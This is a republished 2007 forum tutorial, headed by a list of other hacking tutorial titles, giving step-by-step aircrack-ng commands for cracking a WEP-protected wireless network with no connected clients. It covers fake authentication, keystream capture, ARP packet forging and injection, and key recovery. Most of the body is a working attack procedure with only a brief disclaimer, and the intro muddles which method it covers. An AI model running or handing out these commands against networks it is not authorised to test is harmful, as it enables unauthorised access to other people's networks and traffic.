• cracking wep with no clients
  
• crack wep with aircrack + inject packets ( Windows )
  
• how to bug e-mail
  
• aircrack on backtrack with clients ( wep )
  
• writing a port scanner in java
  

• ettercap part 1
  
• ettercap part 2
  
• rainbow tables
  
• social engineering
  
• google security
  

• using truecrypt to lock up your private data
  
• nmap scanning and portsentry evasion
  
• nmap scanning and portsentry evasion 2
  
• windows xp security
  
• php filtering with owasp
  

• quick and simple netbios exploitation with windows xp
  
• quick and simple netbios exploitation with windows xp 2
  
• quick and simple netbios exploitation with windows xp 3
  
• quick and simple netbios exploitation with windows xp 4
  
• quick and simple netbios exploitation with windows xp 5
  

• computertutorials
  
• computertutorials2
  
• securitytutorials
  
• computertutorials3
  
• computertutorials4
  
• securitytutorials2
  
• securitytutorials4
  

CRACKING WEP WITH NO CLIENTS

Ok, this tutorial should be pretty straightforward and easy, then again, thats the entire idea behind a tutorial right? Anyway, to business, this tutorial will show you how to crack WEP very quickly using the aircrack on the backtrack security liveCD, that you can find here;

http://www.remote-exploit.org/backtrack.html

**quick note, cracking WEP with no clients will be out tonight/sometime real soon**

We will go over
1) Putting your atheros based card into monitor mode
2) Getting packet injection ready
3) injecting/sniffing
4) Cracking the WEP

This is the easier method, the one where the WEP has clients present, and you can use a deauth attack on them. Ok, enough talk, to business!

Monitor Mode

The first thing to do is boot up backtrack, basically by booting to a CD like you normally would, if you can't figure this out, ask down below, or go use google. login to backtrack under root (password 'toor'), and then type "startx" into the command line to start out GUI.

Sweet, now we are running *nix, and we can start the good stuff. Open up a command line, but clicking on the icon that looks like one on the bottom next to the 'start' type thingy (let me know if I get to technical Smile )

Now, we need to enter this into the command line;

Code:
$ airmon-ng start wifi0 6

**starts wifi0 on channel 6, change for the channel of the network you are attacking, use kismet for this, not covered in this tutorial**

$ wlanconfig ath0 destroy
$ ifconfig ath1 up
$ iwconfig ath1 mode monitor 6


Sweet, now we have our card in monitor mode, and we can move onto bigger and better things.

Start up Airodump and getting some info ready

ok, lets start airodump so we can get some info out of it, and then we can just leave it running.

Code:
$ airodump-ng --ivs --write bob --channel 6 ath1

**basically heres what each thing means;
--ivs= only write the weak IV's, not every packet
--write= the prefix of the file we are writing to, so bob.ivs
--channel= the channel to scan on
ath1= our network device**


Now that airodump is running, we need to snag a couple pieces of information from it, 1) The MAC address of the AP we are attacking, it'll be in the first column. 2) the essid of the network, i.e. "linksys", or something similar.

Now, open up a new terminal (DON"T CLOSE AIRODUMP). type this line in;

Code:
 $ export AP=mac_of_ap


Now we also have to get our mac address; this is easy in backtrack just type in the following;

Code:
 $ macchanger --show ath1
**your output here**
export MAC=your_mac_address


This basically just stored those as variables, so you don't have to type them a bunch of times in the coming steps.

Getting everything ready

Basically what we are going to do to the network, is fake authorize ourselves using aireplay. Then using the same program, we are going to grab some peices of packets out of the replies given by fakeauth, and use those to create an arp reply packet with packetforge, to inject into the network to create IV's, so we can crack the key! Whew, lets get started!

First we need to set up, but NOT run our fake auth attack;

Code:
$ aireplay-ng -1 0 -e linksys -a $AP -h $MAC ath1


so, we are running aireplay attack 1, with no delay, linksys is the essid of the network we are attacking, -a is the MAC of the AP we are attacking, and -h is our MAC address. Don't run this yet, we will soon enough.

Open up another command line, so we can get ready to sniff out the packets we need. Enter the following;

Code:
$ aireplay-ng -5 -b $AP -h $MAC


Cool, step 1 of 2 is done for getting ready to create IV's, next we have to sniff a packet, and then create one of our own. So run the aireplay -5 command first, it will start to sniff the network, then run the first command. Eventually the -5 will find a packet that it can use, and it will ask you if you want to use it, say yes (type y and press enter). Now you can cancel the first command (stop it from fake auth'ing over and over) by pressing ctrl-c. Leave the window open.

Now, after we told aireplay-ng -5 yes, it should have created a .xor file. In the output, the name of it should be there. The line looks like this;

Code:
 Saving Keystream in fragment-0215-124336.xor

**yours will be different**


Now, using this .xor file we can create an arp-reply package which we can inject to create weak IV's. So in the same window we ran the aireplay-ng -5 command, type in the following;

Code:
$ packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y your_.xor_file.xor -w arp-request


That will generate what we need, now we can run the final injection command that will inject the arp-request packets. Enter the following;

Code:
 aireplay-ng -2 -r arp-request ath1

*you will have to say yes again btw*


Now you get to watch your #data column in airodump (you didn't close it did you?) skyrocket! Wait a few minutes, and when you have 100k packets (the #data column, 1 mil for 128 bit) run the following command to crack the key!

Code:
$ aircrack-ng -n 64 -b $AP *.ivs

**note, if its 128 bit, change 64 to 128**


There ya go! You have cracked WEP when there are no clients on the network!

**This is an education peice, you should not be cracking anybody elses network, it can get you fined/landed in jail, I take no responsibility for anything you do with this information**

Are you in need of a wireless barcode scanner?  If you are looking for the best in barcode labels  and barcode accessories, our websites is the only place you will need to look.  We sell a wide variety of barcode products such as a zebra label printer!  If you need a barcode printer or reader, we can help! 

Original Tutorial by jaymill230 for TheTAZZone-TAZForum

Originally posted on May 1st, 2007 here

Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post...we do not sell, publish, transmit, or have the right to give permission for such...TheTAZZone merely retains the right to use, retain, and publish submitted work within it's Network.

................................................................................................

ITRiskSpace

Our mission is to deliver to our readers top quality IT-Risk Management and IT-Security related content. Providing you with a source of information on how to increase business value for your organization. We want to be on the pulse of time and contribute for a broad range of stakeholders in this field.